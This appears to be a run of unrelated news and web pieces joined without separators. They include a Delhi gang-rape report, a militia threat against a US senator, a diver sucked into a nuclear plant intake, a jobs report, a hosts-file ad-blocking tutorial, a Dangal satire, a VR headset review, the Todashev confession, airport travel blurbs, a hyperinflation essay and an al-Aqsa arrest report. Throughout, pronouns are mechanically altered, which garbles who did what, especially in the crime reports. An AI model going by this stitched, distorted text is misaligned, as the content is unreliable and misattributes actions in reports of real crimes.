Despite the enactment of stringent anti-rape law – Criminal Law ( Amendment ) Act , 2013 – brought after the 2012 Delhi gang-rape case with an aim of providing a strong deterrent against crimes like rapes , nothing seems to deter potential rapists .
In yet another shocking incident , a 16-year-old girl was allegedly gang-raped by 25 persons at an isolated place in Delhi .
Indiatimes
The minor – who belongs to Jamia Nagar of Southeast Delhi – was allegedly taken hostage by a boy “ known to her ” , blind folded and taken to the isolated place where they were gangraped by 25 men , including the accused , on August 25 .
After the medical examination of the victim confirmed rape , an FIR was registered on Saturday night and the police have arrested the main accused who according to them is a “ juvenile ” . But the rest 24 accused are still at large .
According to the girl 's mother , who is a domestic help , their daughter – a class 9 student – met the alleged prime accused through one of their school friends . They allegedly began befriending the victim . One day , as claimed by the victim 's mother , they allegedly lured them to a nearby place where they first raped them and filmed the heinous act on August 11 .
Do n't Miss 127 SHARES 1.4 K SHARES 1 K SHARES 7.5 K SHARES
“ Since then , they started blackmailing my daughter and kept raping them Over a period of time , they were joined by different people at different places . When we noticed that they are coming home late , we inquired about it . But they did not disclose anything . They were threatened of dire consequences , ” the victim 's mother told Indiatimes .
India Today
When they returned home on Friday evening , they – said their mother – was in “ extreme pain ” . They had scratches on their body and was not even able to walk and sit properly . “ Even then they did not tell us anything . They shared the trauma one of my neighbours who then informed us , ” they said .
Asked if the victim can recognise the culprits , the grieved mother said their daughter knows the prime accused by face . “ The rest of them had their faces covered . They used to blindfold before the heinous act , ” they added .
The incident was reported to the police after the victim 's mother sought financial help from one of their employers who are a social activist .
“ She was inquiring about doctors and sought financial help . When asked who needs medical assistance in their family , they were initially reluctant . But later , they narrated the ordeal their daughter was suffering . We told them they must approach to the police as what has happened to their daughter is a heinous crime . After a lot of persuasion , they finally agreed to report the matter . We got their FIR lodged . They were immediately sent to hospital for medical examination and treatment , ” said Musharraf Hussain – the social activist at whose place the victim 's mother works as a domestic help .
The police said the arrested boy , who is also a minor , is being questioned . During initial questioning , they have not confessed to their crime and disclosed names of the co-accused . “ He has even denied knowing the victim . On the other hand , the girl is in extreme trauma . They are repeatedly changing their statement , ” sources said .
A private NGO is providing counselling to the victim . The police are also trying to get hold of the video clip .
This may be Jon Ritzheimer 's craziest stunt yet .
The organizer of a protest and “ Draw Mohammad ” cartoon contest earlier this year outside a Phoenix mosque threatened in an open letter posted online Monday to arrest a Democratic senator over their support for the Iranian nuclear deal .
The open letter did not appear publicly on Ritzheimer 's Facebook page , but their supporters posted it on their profiles . In the letter , Ritzheimer , a former U.S. Marine , identified themselves as a member of two loosely-organized militia groups — the Oath Keepers and the Three Percenters — and announced that they and “ a growing number of patriots ” planned to arrest Sen. Debbie Stabenow ( D-MI ) .
“ She will be arrested for treason under Article 3 Section 3 of the Constitution , ” the open letter read . “ We have chosen them as our first target due to our strong ties with the Michigan State Militia and their lax gun laws that will allow us to operate in a manner necessary for an operation like this . After we successfully detain them we will continue to move across the country and arrest everyone involved with the Iran Nuke Deal . Even the President who brokered this deal . ”
A Stabenow aide declined to comment on the letter to Roll Call . U.S. Capitol Police told the publication that law enforcement was monitoring the situation , however .
“ The US Capitol Police are aware and are working with local law enforcement in Michigan on the matter , ” Capt . Kimberly Schneider told Roll Call in an email .
Ritzheimer apparently is operating without the support of the Oath Keepers , which is made up of current and former military and law enforcement officers who pledge to defend the Constitution . A spokesperson for the group told The Washington Times that the Oath Keepers did not endorse their plan and was working to boot them from the organization .
“ He has now been suspended for their actions , and we are in the process of following our bylaws to kick them out entirely , ” Oath Keepers media director Jason Van Tatenhove told the publication . “ We , in NO WAY condone their actions , and are in the process of putting out statements to our membership to inform them of such . ”
Since the open letter appeared on Facebook , it 's worth noting that Ritzheimer has said he 's been the victim of Facebook hoaxes before .
Following their Phoenix protest , which they told TPM they organized in solidarity with anti-Muslim activist Pam Geller after their “ Draw Mohammed ” event in Garland , Texas was attacked by two gunmen , a GoFundMe page appeared with the goal of raising $ 10 million to either protect Ritzheimer 's family or allow them to challenge Sen. John McCain ( R-AZ ) . Around that time , Ritzheimer told a local TV station that they thought they needed to go into hiding .
Ritzheimer later made a reference to a “ fake ” GoFundMe campaign in a video they posted to Facebook , adding that “ hackers have ruined my life . ”
“ They 've made fake Facebook accounts , fake GoFundMe accounts , fake — just all kinds of stuff , ” they said in the video . “ They 've exposed my social . They 've exposed everything about me , credit cards — you name it . They 're playing dirty . ”
The last we heard from him , Ritzheimer was selling their motorcycle on Craigslist to get money for more gun purchases .
FORT PIERCE , Fla. ( AP ) _ An offshore intake pipe sucked up a scuba diver and pulled them 1,650 feet through the duct , depositing them at a nuclear power plant .
″I thought I was dead , ″ said William Lamm , 45 , who was spearfishing when they were pulled into the 16-foot diameter , barnacle-studded pipe off Florida Power & Light 's St. Lucie nuclear plant on the Atlantic Coast .
″It was darker than any dark I 've ever seen , and I tried to hold my arms in front of me for balance , but I tumbled and bounced all over the sides of the pipe.″
Lamm 's trip through the plant cooling-water system ended four minutes later in a canal at the power station , where a security guard saw them surface , FPL said . The scuba diver was shaken up and scraped but not seriously hurt .
Lamm said the suction pulled off their mask and diving gloves and ripped their mouthpiece out several times as they moved through the pipe at 7 feet per second .
The pipeline has no grating but a 70-by-70-foot cap suspended a few feet above the opening to reduce suction and prevent the capture of foreign objects such as fish and turtles , utility spokesperson Gary Mehalik said Wednesday .
″You 'd have to get up underneath the velocity cap and then approach it over the intake″ to get caught , they said .
The intake is marked by a buoy and is listed as a hazard on navigation charts , Mehalik said .
But Lamm said they saw no danger signs .
″There was a buoy nearby , but that marked the shallow water , ″ they said . ″I got into about eight feet of water and got sucked down , then in.″
The Nuclear Regulatory Commission will investigate , said spokesperson Steve Horwitz in Atlanta .
Lamm , a scuba diver for five years , said it will be a long time before they dive again , if at all .
The total labor force grew by 418,000 , possibly accounting for the relatively modest net level of job growth compared to the total employed . The labor force participation rate , which reflects those working as well as looking for work , edged higher to 63.6 percent but remained around 30-year lows .
`` You have to be careful , particularly about components of the household numbers that are highly volatile , '' said Liz Ann Sonders , chief investment strategist at Charles Schwab in San Francisco . `` It 's been our view that we would see a slow but consistent improvement in the jobs picture . I 'm not sure this changes that view much at all . ''
Economists were expecting 113,000 more jobs and the rate to rise to 8.2 percent . Last month saw 142,000 new jobs as the rate dropped from 8.3 percent in July .
However , those numbers were revised higher , with the Labor Department putting July 's number at 181,000 from the previously reported 141,000 and August up from an originally reported 96,000 .
The level of part-time workers reported the largest jump for the month , gaining 582,000 .
Jack Welch , the former CEO of General Electric , caused a stir after the numbers were released , tweeting `` Unbelievable jobs numbers ... these Chicago guys will do anything ... ca n't debate so change numbers . ''
The administration rejected the charge that it was manipulating data .
`` I have the highest regard for our professionals that do the calculations at the '' Bureau of Labor Statistics , Labor Secretary Hilda Solis told CNBC . `` They are highly skilled economists , trained in this area . ''
Still Solis acknowledged that `` we still need to do more '' in terms of job creation .
The U-6 unemployment number , which accounts for the underemployed and those who have given up looking for jobs , held steady at 14.7 percent .
`` With a gain of 114,000 jobs in September and an upward revision for August , this economy remains on a slow but not slowing growth path , '' said Kathy Bostjancic , director of macroeconomic analysis at The Conference Board . `` Right now , slow job and income growth is about all the economy is capable of generating as businesses remain focused on cutting costs . ''
With President Obamatrying to stave off a challenge from Republican Mitt Romney , the state of the economy remains the critical point . Friday 's report underscored how slowly the jobs market is recovering from the depths of the 2008 financial crisis and likely will stoke increased debate amid the halting gains the latest numbers indicate .
I had a rough week last week ; my ankle went wonky again so I could n't run , work was horrific , and to top it all off , I managed to lose every . single . oven mitt . All of them suddenly disappeared , making my favorite pastime of stress baking much more difficult .
With all of this happening I was cautiously optimistic when I received notification on Monday that my present had shipped . I thought `` Hey , maybe this week will bet better . '' And you know what ? It was . My Santa 's goodwill started working immediately : work was great and my ankle started feeling better . I still could n't find any of my oven mitts , but since I had a shopping trip planned soon , I figured I 'd be fine .
It came while I was at work today . I got home to find that my cats had been thoroughly intrigued by the box , if the fur and nibble marks were any indication . I was just as intrigued but , thanks to my opposable thumbs , much more able to open it . Open it I did , to find ... Presents !
The bravest of my two cats , Pirate , immediately claimed and killed the bubble wrap . Next up was the card - a super sweet snowman to go on my wall , with a super sweet message from my Santa inside . Then I saw the gelt ( chocolate coins ) , yum ! After those , the stocking . More chocolate , yay ! Band-aids , I just got a papercut , so incredibly convenient . Then , oven mitts ! ! ! ! ! ! ! My stress baking can resume !
The brave Pirate fled in terror from my squeals and flailing at the next presents . A Flyers T-shirt ! ! ! ! It 's exactly the one I 've wanted but could n't bring myself to buy , and it fits perfectly ! Then a headband to finally keep my from sweating into my eyes when I run ! In my favorite color ! Then a book about Monty Python ! Then a daily calendar filled with fascinating trivia !
Joyfully exhausted , I lay next to the package dreaming of my eye-sweat free run tomorrow while Pirate returned to kill the bubble wrap again . Santa , you are amaaaaaaazing ! ! !
The Canadian Radio-television and Telecommunications Commission ( CRTC ) today announced that Plentyoffish Media Inc. has paid $ 48,000 as part of an undertaking for an alleged violation of Canada 's anti-spam legislation ( CASL ) . PlentyOfFish is based in Vancouver , British Columbia and is an online dating service , popular primarily in Canada , the United Kingdom , Ireland , Australia , Brazil and the United States .
The issue came last year between July 1st and October 8th , 2014 when the company sent emails that did not have an unsubscribed mechanism that was not clearly and prominently set out , and which could not be readily performed , as required by CASL .
As you recall from just a few short weeks ago , we also reported on CRTC issuing its first fine under the anti-spam legislation . Quebec-based Compu-Finder was handed a $ 1.1-million fine for violating the law and already we have another case and goes with what we mentioned then how the CRTC is aware of companies – even in Canada – flagrantly violating the basic principles of the law by continuing to send unsolicited commercial electronic messages after the law came into force .
This is n't the first case of its kind when dealing with unsubscribe mechanisms . In 2006 , the Federal Trade Commission ( FTC ) charged Yesmail failing to honor unsubscribe requests by sending thousands of commercial email messages to recipients more than 10 business days after their requests . In that case , Yesmail agreed to pay a $ 50,717 civil penalty to settle Federal Trade Commission charges that it violated federal law .
Both of this case are an important reminder to businesses that they need to review their unsubscribe mechanisms to ensure they are clearly and prominently set out and can be readily working and that the CRTC is serious about aspects for the requirements of CASL .
Advertisement
The internet has lots of benefits but on the other hand , it has its downsides that we all love to hate . The most common one is pop-up ads but if you have young kids who like to surf the net , then as a parent , you will want to protect them from porn sites and any other sites you deem undesirable for such young impressionable minds – such as the Teletubbies .
Well you may not know that it is relatively easy to set up your own internet filter to stop certain websites and pop-up windows from being accessed and shown on your computer – and it already resides on your Windows operating system in the form of the Hosts file . Just adding a line to the file can stop a website or a pop-up window in its tracks .
The Hosts file is located at Windowssystem32driversetchosts . The file has no file format so when you double-click on it , you 'll be asked how you want to open it . Just choose Notepad to open the file as a text file . If you are not so experienced in dealing with the Hosts file , you may want to make a backup of this file before you start altering anything .
When it is opened , this is what you will see :
The first thing you have to notice is the line 127.0.0.1 local host at the bottom . That 's your computer .
To block a website from your browser is very easy . Say you suddenly develop an overwhelming hatred for Google and you want to banish them to the internet graveyard . Time to give it the Hosts file treatment !
On the bottom line of the file ( underneath 127.0.0.1 local host ) , just type :
127.0.0.1 www.google.com
Save it and close the file . But there are three things to make sure of to ensure this works properly :
Make sure that the file is still called “ hosts ” ( without a file format at the end such as “ hosts.txt ” ) . If Windows attempts to assign a file format to the file , remove it .
Do NOT add “ http ” at the start of the URL . Doing so makes the entry invalid . Just “ www ” is enough .
You will probably have to re-start your browser for the changes to start working and in some cases , it may take a minute or two for the URL to be blocked .
Now try to access the site in question . You 'll see that you now get a blank page . Totally inaccessible . Every attempt to access the URL just gets automatically bounced back to you with the blank page .
If you suddenly decide you 're madly in love with Google again , just open up the Hosts document again and delete the line you just inputted . Save and close the file , then re-start the browser . Google will suddenly become available again .
So how does this stop block-up ads ? Well when the ad comes up on your screen , take a note of the URL that it is coming from and add it to your Hosts file . Save and close then go back to the website in question . You 'll suddenly find that pop-up ad does n't appear anymore !
Now you 're probably saying that with pop-up blockers being standard in browsers these days , what 's the point of this ? But pop-up blockers are not 100 % perfect . I know of one website that overpowers the pop-up blocker and loads up pop-up windows without any resistance from Firefox or the Google toolbar pop-up blocker . So sometimes you need a little more than your browser to stop those nasty critters .
If you do a Google search , you 'll find people who have compiled lists of malicious URL 's that you can add to your Hosts list . This includes pop-up ads , spyware , trojan horses and porn . But I prefer to just add to the Hosts file myself on a site-by-site basis . Creators of these URL lists can get a bit carried away with privacy and end up giving us URL 's that can block sites we may consider legitimate . So I think it 's best to do it yourself .
So if you have essential sites constantly popping ads up at you or if you want to filter out naughty sites from your kids , the Hosts file is a fairly simple way of doing it .
Aamir Khan 's garbage film Dangal released this week and left us totally disappointed . We had so much expectation from Aamir that they will bash Hindutva and Modi in the film but on the contrary , it was a jingoistic film promoting nationalism .
We also hear that Right Wingers are flocking to the multiplexes to watch the film and that should be enough for us to boycott this propaganda to avoid sharing space with subhuman Sanghis , but that is not all .
Here are five reasons why we think every liberal must boycott the film :
- Advertisement - - Article resumes -
1 . Right from the start of the film , Aamir Khan talks about winning an international medal for the country . In this age of jingoism and rising hyper-nationalism , is it right to push this agenda of doing something for the country ? Why could n't Aamir talk about doing something for humanity instead of doing something for India ? We successfully stopped India from winning the Cricket world cup last year , but this year we were let down by Aamir .
2 . Aamir Khan feeds their daughters chicken for Protein . This is anti-secularism . If Aamir was really secular , they would have been cooking beef for their daughters . As people might recall , we have reiterated multiple times that only beef has the necessary protein , plus beef is secularism on a plate .
3 . While we are protesting National Anthem before the start of a film , Aamir inserted another national anthem towards the end of the film ! Everyone stood up in the cinema twice while we sat there looking like idiots . If that was n't enough , the film even had chant of ‘ BHARAT MATA KI JAI ' , and the chant was n't even sarcastic . The movie leaves you with such a bad taste that you want to eat beef .
4 . Aamir Khan 's daughter is named ‘ Geeta ' in the film . Is Aamir spreading soft-Hindutva through the film ? Why did n't they name their daughter Salma or Susan ? They have 4 daughters in the film , if they wanted , they could have covered all religions but they gave all of them Hindu names . But then , we live under Hindutva fascist government . The space for diversity is shrinking and Dangal is a proof of that .
5 . The film ends with Commonwealth Games as the backdrop but not even once do they mention the great work of Suresh Kalmadi and Sheila Dixit in hosting the event . Were the producers threatened by the Hindutva fascists in charge now to avoid praising secular leaders of yesteryears or the producers ignored them on their own ? Either way , we are disappointed .
( this article is satire )
Bullshitting sitting in Lutyens Delhi .
Share This Post and Support :
LG is jumping on the VR bandwagon with the release of its new LG 360 VR headset , designed exclusively for the new G5 phone . We had a chance to try it during Mobile World Congress in Barcelona and ended up with some strong feelings . The LG 360 VR is way less immersive ( and impressive ) than other headsets like the Gear VR , Oculus Rift , and HTC Vive—and it 's hard to imagine who on Earth would want a headset like this .
Why ? First of all , the whole headset is smaller and clunkier than any other headset I 've tried . It 's actually so thin that it does n't fully cover your eyes , so a reasonable amount of light enters your vision while you 're wearing the headset .
Light leaks tend to ruin any VR experience , because they end up making you feel connected to the real world , rather than being able to focus on the virtual one . It 's also annoying to see moving things enter and exit your peripheral vision . On the spectrum of immersion , the LG 360 VR undoubtedly ranks last .
The LG 360 VR 's display is also much worse than the ones in other popular VR headsets . The resolution and lag are horrid compared to the LG 's biggest competitors . In virtual reality , lag is most commonly experienced when you move your head from side to side . During our short trial of the LG 360 VR , every single time I tried to move my head the image blurred ( because of lag ) . The problem was enough to completely ruin my experience and distance me from the idea that I was actually riding a rollercoaster .
Advertisement
The problem is likely because the LG 360 VR headset must be connected directly by wire to the G5 smartphone . The phone is more than likely handling the graphics processing , and it 's safe to say that it was a little overmatched for the software it was running . The headset is nowhere near the capabilities of the Oculus , Vive , or PlayStation VR—which use powerful PC rigs to handle the processing instead of a smartphone chip .
How does it stack against the Gear VR , then ? I 'd say pretty badly . Even though Samsung 's VR experience still has a long , long way to go , LG 's is worse in almost every way I can think of . We still do n't know the price on LG 's VR bet , but I suspect it will significantly cheaper than Samsung 's offer . If it 's not any cheaper , it will probably fail miserably .
Advertisement
The only upside , if there is one , is that the LG 360 VR might be used in the same way that Google 's Cardboard is . They 're not the top VR headsets or the most immersive VR experiences , but they 're decent at handling basic tasks like displaying 360-degree images or videos . To be sure whether the the LG 360 VR is actually worth it , we 'll need more info about its price , tech specs , and availability . Expect more info about the LG 360 VR later this year .
Eyewitness : Waltham Crime Scene Did n't Match Description of Triple-Murder in Todashev 's Confession
Get a compelling long read and must-have lifestyle tips in your inbox every Sunday morning — great with coffee !
The English is awkward and the handwriting in places illegible , but the threadbare narrative that emerges from Ibragim Todashev 's alleged confession note seems to contradict the facts of the crime to which Todashev was allegedly confessing .
On Tuesday , Boston magazine obtained what appears to be an unredacted photograph of the confession that law enforcement officials say Todashev wrote just before an FBI agent shot them to death on May 22 , 2013 . ( A redacted version was released earlier Tuesday as part of the Florida state attorney Jeff Ashton 's long-delayed , 600-plus page report on the incident . ) In the unredacted note , Todashev appears to implicate themselves and their friend Tamerlan Tsarnaev—a suspect in the Boston marathon bombing—in an unsolved triple murder from 2011 .
But the note raises as many questions as it answers . The note seems to state that Tsarnaev was armed with a gun when they and Todashev arrived at the house where the murders took place . There were “ 3 guys in there , ” the note reads . “ We put them on the ground. ” The story breaks off after four clearly written words : “ taped their hands up . ”
The “ taped their hands up ” detail may seem glancing . Yet it drew particular attention from investigators ; it was cited in the Ashton report as having demonstrated “ the gravity of their [ Todashev 's ] involvement with the crimes being investigated at the time . ”
But when Hiba Eltilib discovered the bodies of their boyfriend Brendan Mess , 25 , Erik Weissman , 31 , and Raphael Teken , 37 , their hands were not bound or taped , they said Wednesday in a phone call from Sudan . Eltilib said that they found the bodies in three different rooms , all belly-down , in neat pools of blood , heads turned to the side .
“ None of their hands were tied as I recall , ” they said .
In an interview Wednesday , Aria Weissman , Erik 's sister , said she 'd never heard mention of any of the victims having their hands taped , either . “ That was the first time hearing anything about it being them tied up , that 's really bizarre , ” they said .
And while the note 's claim that “ we put them on the ground ” sounds as if the victims were ordered down at gunpoint , at least two of the victims showed signs of a fight , according to friends who saw the bodies . Weissman had a bloody lip , and Mess had puncture marks on their temple and the top of their head , another mark by their ear , bruises on their face and scratches on their arms .
The confession mentions a gun , but it does n't mention the murder weapon . When Eltilib discovered the bodies on September 12 , 2011 , the victims ' throats had been slit with enough force to nearly decapitate them . The note suggests the motive for the crime was a “ robbery , ” even though eight and a half pounds of marijuana and $ 5,000 in cash was left in the apartment—and all three of the victims knew Tamerlan . Mess was a close friend .
Of course , by all accounts , the confession was incomplete . And because of the difficulty in deciphering the document , it 's impossible to say for sure that the note is inconsistent with reports of the crime scene . “ Put them on the ground , ” for example , might have been Todashev 's way of describing a physical fight . The note ends abruptly ; there was almost certainly more to the story , but Todashev never finished it .
“ Clearly it does n't seem like they were writing for very long , and typically those types of statements can be pages long , ” said former FBI agent Mike German , a fellow for the Brennan Center for Justice .
German , who is not involved in the case , said it 's unusual for a written confession to contradict the crime scene . Typically , German said , agents address any inconsistencies in a suspect 's story before the confession is written .
“ You would go back and say , ‘ Well , there is one detail that 's not quite right , maybe you 're remembering that wrong , ' ” they said .
German also said the length of the interview , which went on for four and a half hours on a sweltering Florida night , could have affected the confession .
“ You always have to worry about false confessions , ” they said . “ Particularly in an interview that 's gone on for so long . The person is sometimes just trying to give the answer that you want . ”
According to the Florida state attorney 's report , the FBI has audio recordings of the Todashev interview which end just as they are beginning to hand-write their confession , near midnight , into the fifth hour of their interview . “ Okay , I 'm telling you I 'm you I was involved in it , okay , I , I had no idea [ redacted ] was gon na kill anyone , ” Todashev allegedly said just before a Massachusetts State Trooper got them to sign a form acknowledging he 'd been read their Miranda rights .
Minutes later , they were dead .
HolidayIQ Traveller Gautam Barman says , “ Agatti is a small island and hence , one can enjoy the sea , the lagoons and the beach . You can go to Bangaram and enjoy a full day there . It is about an hour 's journey by boat . Make sure that the permit and formalities are taken care of beforehand . ”
Surrounded by nothing but the Indian Ocean , the 4,000-foot-long Agatti Airport is so random and petite that it could pass off as a piece of a larger runway lost at sea . The airport is the only one in Lakshadweep - a Indian Union Territory comprising 36 exotic islands located off of the southwestern coast of India , and sits on the island of Agatti .
110+ Ratings | 73+ Reviews | 4 Sightseeings | 21 Photos
HolidayIQ Traveller Dharmender Singh says , “ The nearest airport to Mizoram is Lengpui airport . To enter Mizoram by any means inner line permit is required . At airport ILP counter is there were ILP is issued on arrival . ”
The 2,500 metre runways of the Lengpui airport is unique as it has many hilly streams running underneath . The airport is one among the three airports in India that has a table top runway , which creates an optical illusion .
Where to Stay
8 Sightseeing | 22 Photos
HolidayIQ Traveller Jayesh from Kolkata says , `` Leh is beautiful and is known as the cold desert . Drass , the second coldest place in the world , and Khardungla , known as the world 's highest motorable road , are a must-visit . Things that one should not miss while in Leh - Lamayuru , Thiksey Monastery , double-humped camels at Hunder , sand dunes , Diskit Monastery , Shyok River and shopping in Leh . ”
Kushok Bakula Rimpochhe Airport is an airport in Leh . It 's one of the highest airports in the world at 3,256 m ( 10,682 ft ) above sea level .
2012+ Ratings | 1357+ Reviews | 98 Sightseeings | 1020 Photos
362
`` The state , with many a snow-bound Himalayan peak , has some of the most spectacular landscapes in the country . It also has some very popular holiday resorts which are easily accessible . Apart from sightseeing , it offers immense scope for trekking , skiing and rafting . Shivalik , Dhauladhar and Pir Panjal are the major mountain ranges in the state , '' says HolidayIQ Traveller Peaceman Travel .
Shimla Airport is located in Jabarhatti , 22 kilometres from Shimla . The airport was constructed by cutting down a mountaintop and levelling the area to form the single runway . The small apron has space for two small aircraft to park simultaneously .
13255+ Ratings | 7525+ Reviews | 39 Sightseeings | 765 Photos
It showcases to the world the beauty of Indian art and design . Unlike other museums , you would need an international air ticket to enter — this museum with nearly 7,000 artefacts , a 3 km-long art wall and works by over 1,500 artists , is actually housed inside an airport ! Somewhere between check-in and baggage claim , Mumbai 's new integrated terminal T2 shows off some of the best of Indian arts and craft to foreign visitors as well as Indians .
Winner of HolidayIQ India Says Yes award for Top 25 City Destinations in India
16065+ Ratings | 8118+ Reviews | 906 Sightseeings | 419 Photos
HolidayIQ Traveller Nikhil says , “ Airport of Goa is marvellous in its own . It has cafes and shops to keep the passengers busy but the items are quite expensive . ”
Goa International Airport , more commonly known as Dabolim Airport , is located in the city of Dabolim . It is one of the most beautiful airports in India . It offers a breathtaking view of the Arabian Sea .
4656+ Ratings | 3047+ Reviews | 2431 Photos
[ { `` Agatti '' :1205 , '' Mizoram '' :462 , '' Shimla '' :549 , '' Mumbai '' :468 , '' Goa '' :362 } ,6 ]
The German hyperinflation episode in the early 1920s is often quoted as an example of the dire consequences of excessive money printing – a leading industrial economy succumbing to the dangers of currency debasement promoted by incompetent central bankers .
Alas , the reality is more complex than that , particularly when certain geopolitical and economic constraints of that time are taken into consideration . And as we shall see , we can draw some important lessons from that episode that can help us gauge the effectiveness of our very own currency debasement in the 21st century .
Setting the Stage
Europe radically changed in the aftermath of World War I . Gone were the big empires of Central Europe , and the fragmented states that emerged from them had to cope with a much more modest and uncertain modus operandi . There was a new power emerging farther out in the East , after the Bolsheviks took over Russia , boldly proclaiming that they would not stop there . On the other side of the Atlantic , America demonstrated that it could muster the necessary resources to prevail in a major world conflagration , and that it could become a power to be reckoned with .
Great Britain retained its dominant superpower status , no longer challenged by the once mighty German forces . Because it had security , its major concern henceforth was economic , especially as a countermeasure to the rising Bolshevik threat . France , on the other hand , remained exposed to a resurgent Germany , particularly because the latter had come out of the war with its industrial capability largely intact . Consequently , its concerns were mainly political .
The French believed that the peace of Eastern Europe was a primary concern of the states of Western Europe and that Germany should never be allowed to reassert itself eastwards ; the British saw the two sides of Europe as separated , particularly because the eternal squabbles of Eastern Europeans could drag yet again the major Western powers into another regional conflict , very much like 1914 . France believed that Germany could only be made to keep the peace by duress ; Britain believed that Germany could be persuaded to keep the peace by concessions .
While it was not known then , these divergent views would eventually set the stage for Germany 's hyperinflation episode .
German Reparations
War reparations became a major factor of contention between Western European countries . The French in particular were quite unhappy with results of the Treaty of Versailles , and sought redress at every opportunity .
The preliminary payments were supposed to amount to a total of 20 billion marks by May 1921 , but the recipients contended that only about 8 billion of this had been paid . As a result , Germany received a number of demands and ultimatums from the victors , including the threat of occupation of the Ruhr earlier that year .
Under significant pressure , the Germans eventually agreed to issue bonds totaling 132 billion marks as the total reparation bill . Of these , 82 billion were set aside and forgotten . The remaining 50 billion would be paid in annual installments of 2 billion marks plus a share of German exports .
However , Germany would only be required to pay these obligations if two conditions prevailed : first , that it had a fiscal surplus , so that the government had additional resources beyond what was required to meet its current obligations ; second , that it had a positive foreign trade balance , enabling the country to accumulate enough gold or foreign currencies to settle the reparations .
As it turned out , neither of these conditions existed throughout the entire 1920s , and as such Germany was never in a position to pay any reparations . Money printing ended being the result , although the real drivers of that policy did not lay in the reparations alone .
Inflation Breaks Out
Far from it in fact . The failure to obtain a fiscal surplus was solely the responsibility of the German government , which refused to reduce its own expenditures and the standards of living of its people , or to tax them enough to yield such a surplus .
Germany 's creditors shared the blame for its failure to obtain a favorable balance of trade . While the Germans made little or no effort to reduce their purchases abroad , which would have also curtailed their standard of living , they adamantly refused to allow a free flow of German goods into their countries on the premise that this would undermine their own industries .
Once again , the interpretation of these failures was colored by the geopolitical inclination of the creditor in question . The British saw them as evidence of Germany 's inability to pay , while the French believed that they simply did not want to pay . Actually , both were correct .
Had Germany been allowed to export freely , it probably could have produced enough goods and services to service a meaningful portion of the reparations , as indicated by its comparatively higher per capita income levels as the decade progressed . With this option not on the table , the German government ran successive budget deficits , instead of implementing painful tax increases and budget cuts ( “ austerity ” in today 's lingo ) . The funding vehicle : central bank lending ( the equivalent of our “ quantitative easing ” ) .
Therefore , it was not necessarily the reparations per se that sparked a significant rise in the inflation rate , but rather the policies of the German government intended to circumvent them . The restriction to the free flow of German goods to creditors ' markets substantially compounded the problem – a point which is often underappreciated in understanding the reasons behind the acceleration of inflation during that initial phase .
And accelerated it did . While the par value of the German mark to the British pound was at around 20 , it fell from 305 in August 1921 and then to 1,020 by November that year .
But the worst was yet to come .
Germany Loses the Ruhr
The effects of inflation were felt very unequally across German society . Those whose property was in real wealth , either in land or industrial plants , gained from the inflation as it increased the value of their properties and wiped away their debts . It was the middle class ( as always ) that was getting ruined .
In July 1922 , Germany demanded a moratorium on all cash payments of reparations for the next thirty months . Although the British were willing to yield at least to part of this , the French argued that the Germans had made no real effort to pay their debts and that , accordingly , such moratorium would only be acceptable to them if accompanied by adequate guarantees .
This meant that the creditors should take possession of various forests , mines and factories of western Germany , as well as the German customs , to obtain incomes which could be applied to reparations . As such , in January 1923 , the Reparations Commission voted 3 to 1 ( with Britain opposing France , Belgium , and Italy ) that Germany was in default of its payments . Armed forces of the three nations began to occupy the Ruhr two days later .
This area was vitally important for the German economy . With 10 % of the population , it produced 80 % of the country 's coal , iron and steel and generated 70 % of its freight traffic . As a result , Germany retaliated , declaring a general strike in the area , ceasing all reparations payments and adopting a program of passive resistance . As a result , more paper money had to be printed to support the strikers .
By the end of 1923 , the output of the area was brought down to one-third its capacity . At this point the German mark had all but collapsed , going from 80,000 marks to the pound in January 1923 to 20 billion by December 1923 .
And here 's another important point to bear in mind : it was the curtailment of Germany 's productive capacity , sustained with even more money printing , which sealed the demise of its currency .
Resolution
Resistance in the Ruhr put a great strain on Germany , both economically and financially , and a great psychological strain on the French and Belgians . At the same time that the German mark was being ruined , the occupying countries were not obtaining the reparations they desired .
Accordingly , a compromise was reached by which Germany accepted another plan for reparations ( the Dawes Plan ) and the Ruhr was evacuated .
The victors in this episode were the British , who had demonstrated that the French could not use force successfully without British approval . This would have important geopolitical consequences in the years that followed .
But there were other victors as well : the radical political parties in Germany , feeding on the resulting humiliation and frustration felt by large parts of the population . The most radical of them would rise to power within a decade .
Lessons for Today
This episode illustrates less obvious yet crucially important points on the dynamics of money printing , particularly when interplayed with productive capacity and free markets . Abundant paper credit might be a necessary condition to generate high inflation rates , but in today 's world it is far from being a sufficient condition .
In an open economy , inflation can manifest itself as a sustained increase in prices and/or a deterioration in the balance of trade . Regarding the latter , in the days of the gold standard , the resulting outflows of gold would function as a self-correcting mechanism : the central bank would have to raise rates to reverse those outflows and cool off the internal demand which created the imbalance in the first place .
Today we have fiat currencies , driven by differentials in interest rates , inflation expectations , risk premiums , credit creation and so forth , so those imbalances can persist for longer . And there 's one vital improvement relative to the 1920s ( in fact all the way up to the late 1970s ) : virtually limitless production capacity .
Over the past few decades capitalism and globalization made possible the rapid assembly of production capacity anywhere in the world – by entrepreneurs and , in some very important cases , central planners ( read : China ) . Supply can thus rapidly rise to absorb increases in demand , dampening any lasting effects on price .
Global markets have become very efficient in spotting price arbitrage opportunities and eliminating them through the free movement of capital and goods . The result : an inherently deflationary system for Western economies , particularly when coupled with high debt loads that can curtail the sustainability of pickups in demand .
Do n't believe us ? Just look at the evolution of China 's foreign exchange reserves during the last quantitative easing program by the US Federal Reserve .
Monthly Foreign Exchange Reserves in China ( USD bn ( LHS ) , yoy % ( RHS ) ) :
Sep 12-Dec 14
Source : PBOC , J Capital .
Those newly minted US dollars went to China in search of yield and cheaper goods and services , as evidenced by the rise and fall of the latter 's growth in foreign exchange reserves almost in sync with the Fed 's money printing . Any wonder why inflation remains subdued in the US ?
As long as global markets remain open and free , Western policymakers will have a hard time creating lasting inflation . Of course there is a number that might do it . But some developments could make this a near certainty , as we have seen from Germany 's episode : a big deflationary shock could bankrupt and take out large portions of industrial capacity ; water constraints and evolving weather patterns could limit food production ; energy might become much more expensive at some point ; capitalism can be dismantled ; free trade could be severely restricted ( more Russian sanctions anyone ? ) .
And if we get there under these circumstances , our central bankers may discover that they have as many unpalatable choices as their German peers in the early 1920s .
This video shows Israeli occupation forces assaulting and arresting an elderly Palestinian man at the al-Aqsa mosque in eastern occupied Jerusalem 's Old City on Sunday morning .
Quds News Network , which posted the video on its social media accounts , gave the man 's name as Abu Bakr al-Shaimi .
As armed occupation forces assault al-Shaimi , who attempts to evade their capture , a voice can be heard on the video warning that they have a heart ailment .
